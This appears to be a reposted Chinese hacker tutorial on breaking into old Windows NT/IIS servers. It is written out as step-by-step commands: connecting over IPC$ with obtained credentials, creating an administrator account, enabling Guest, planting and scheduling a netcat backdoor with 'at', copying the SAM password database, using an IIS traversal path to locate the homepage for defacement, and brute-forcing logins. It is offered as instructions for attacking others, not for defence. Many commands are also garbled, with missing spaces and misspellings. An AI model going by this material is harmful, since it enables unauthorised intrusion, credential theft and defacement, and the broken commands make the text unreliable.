成爲真正黑客必須掌握的入侵技術——————【Badboy】

只要刪除這些就可以了有些系統NT裝置在D盤或其他盤,就要把C改成其他盤。

 1NET

只要你擁有某IP用戶名和密碼,那就用IPC$做連接吧!

這裏我假如你得到用戶是hbx密碼是123456假設對方IP爲127.0.0.1

netus\\127.0.0.1\ipc$"123456"/user:"hbx"

退出的命令是

netus\\127.0.0.1\ipc$/delte

下面的操作你必需登陸後纔可以用.登陸的方法就在上面.

----------------------

下面我講怎麼創建一個用戶,由於SA 權限相當於系統的超級用戶.

加一個heibai用戶密碼爲lovechina

netuserheibailovechina/add

只要顯示命令勝利,那麼我可以把他加入Administr組了.

netlocalgroupA dministrheibai/add

----------------------

這裏是講映射對方的C盤,當然其他盤也可以,只要存在就行了.這裏把對方的C盤映射到外地的Z盤.

netusz:\\127.0.0.1\c$

----------------------

netstarttelnet

這樣可以打開對方的TELNET服務.

----------------------

這裏是將Guest用戶激活,guestNT默認用戶,而且無法刪除呢?不知道是否這樣,2000就是刪除不了

netuserguest/active:yes

----------------------

這裏是把一個用戶的密碼改掉,把guest密碼改爲lovechina其他用戶也可以的只要有權限就行了呀!

netuserguestlovechina

net命令果然強大啊!

2:at

一般一個入侵者入侵後都會留下後門,也就是種木馬了把木馬傳了上去,怎麼啓動他呢?

那麼需要用AT命令,這裏假設你已經登陸了那個服務器。

首先要得到對方的時間,

nettime\\127.0.0.1

將會返回一個時間,這裏假設時間爲12:1現在需要新建一個作業,其ID=1

at\\127.0.0.112:3nc.exe

這裏假設了一個木馬,名爲NC.EXE這個東西要在對方服務器上.

這裏介紹一下NCNCNETCA T簡稱,爲了方便輸入,一般會被改名.一個TELNET服務,端口爲99.

等到12:3就可以連接到對方的99端口.這樣就給對方種下了木馬.

3:telnet

這個命令非常實用,可以與遠方做連接,不過正常下需要密碼、用戶,不過你給對方種了木馬,直接連到這個木馬打開的端口.

telnet127.0.0.199

這樣就可以連到對方的99端口.那你就可以在對方運行命令了這個也就是肉雞.

4:FTP

可以將你東西傳到對方機子上,可以去申請個支持FTP上傳的空間,國內多的如果真的找不到給個WWW.51.NET不錯的.當我申請完後,會給用戶名,密碼,以及FTP服務器.

上傳前需要登陸先,這裏我假設FTP服務器是WWW.51.NET用戶名是HUCJS密碼是654321

ftphttp://www.51.net

會要求輸入用戶,勝利後會要求輸入密碼.

下面先說上傳,假設你需上傳的文件是INDEX.HTM位於C:\下,傳到對方D:\

getc:\index.htmd:\

假設你要把對方C盤下的INDEX.HTM下到機子的D盤下

putc:\index.htmd:\

5:copy

下面我說說怎樣把本地的文件複製到對方硬盤上去,需要建立好IPC$連接纔有效。

這裏我把本地C盤下的index.htm複製到127.0.0.1C盤下

copiindex.htm\\127.0.0.1\c$\index.htm

----------------------

如果你要複製到D盤下把C改爲D就行了!

copiindex.htm\\127.0.0.1\d$\index.htm

----------------------

如果你要把他複製到WINNT目錄裏

就要把輸入

copiindex.htm\\127.0.0.1\admin$\index.htm

admin$winnt

----------------------

要把對方的文件複製過來,順便告訴大家NT備份的數據庫放在x:\winnt\repair\sam._sam._數據庫的文件名

下面就把127.0.0.1數據庫複製到外地C盤下

copi\\127.0.0.1\admin$\repair\sam._c:\

----------------------

6set

如果你跑進了一部機子,而且想黑他這思想只能在特別時候才準有)當然他80端口要開,不然你黑給誰看。這時需要用SET命令!

下面是得到結果!來分析它只是找主頁在那而已。

COMPUTERNA ME=PENTIUMII

ComSpec=D:\WINNT\system32\cmd.exe

CONTENT_LENGTH=0

GA TEWA Y_INTERFA CE=CGI/1.1

HTTP_A CCEPT=*/*

HTTP_A CCEPT_LA NGUA GE=zh-cn

HTTP_CONNECTION=Keep-A live

HTTP_HOST=當前登陸者的IP這裏原本是顯示我IP被我刪除了

HTTP_A CCEPT_ENCODING=gzipdeflate

HTTP_USER_A GENT=Mozilla/4.0compatible;MSIE5.0;Window98;DigExt

NUMBER_OF_PROCESSORS=1

Os2LibPath=D:\WINNT\system32\os2\dll;

OS=Windows_NT

Path=D:\WINNT\system32;D:\WINNT

PA THEXT=.COM;.EXE;.BA T;.CMD

PA TH_PA NSLA TED=E:\vlroot主頁放在地址,只要你看到PA TH_PA NSLA TED=後面就是主頁的存放地址。這裏是E:\vlroot

PROCESSOR_A RCHITECTURE=x86

PROCESSOR_IDENTIFIER=x86Famili6Model3Step3GenuineIntel

PROCESSOR_LEVEL=6

PROCESSOR_REVISION=0303

PROMPT=$P$G

QUERY_SPING=/c+set

REMOTE_A DDR=XX.XX.XX.XX

REMOTE_HOST=XX.XX.XX.XX

REQUEST_METHOD=GET

script_NA ME=/scripts/..%2f../winnt/system32/cmd.exe

SERVER_NA ME=XX.XX.XX.XX

SERVER_PORT=80

SERVER_PORT_SECURE=0

SERVER_PROTOCOL=HTTP/1.1

SERVER_SOFTWA RE=Microsoft-IIS/3.0對方使用IIS/3.0

SystemDrive=D:

SystemRoot=D:\WINNT

TZ=GMT-9

USERPROFILE=D:\WINNT\Profiles\DefaultUser

windir=D:\WINNT

粉紅色的那行就是對方主頁存放地址,這裏告訴大家一個技巧,很笨的技巧啊,不過只能用這個方法才幹100%找到主頁的名稱,當你DIR這個目錄時,一定會看到很多文件,可以把所有文件在瀏覽器這樣輸入XX.XX.XX.XX/文件名,這樣只要看到和XX.XX.XX.XX看到也面一模一樣,那麼這就是主頁的名稱了

7nbtstat

如果你掃到一部NT機子,136139其中一個端口開了話,就要用這個命令得到用戶了順便告訴大家這是netbio得到用戶名後就可以猜猜密碼了例如比較簡單的密碼,密碼和用戶名一樣的都試下,不行就暴力破解吧!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章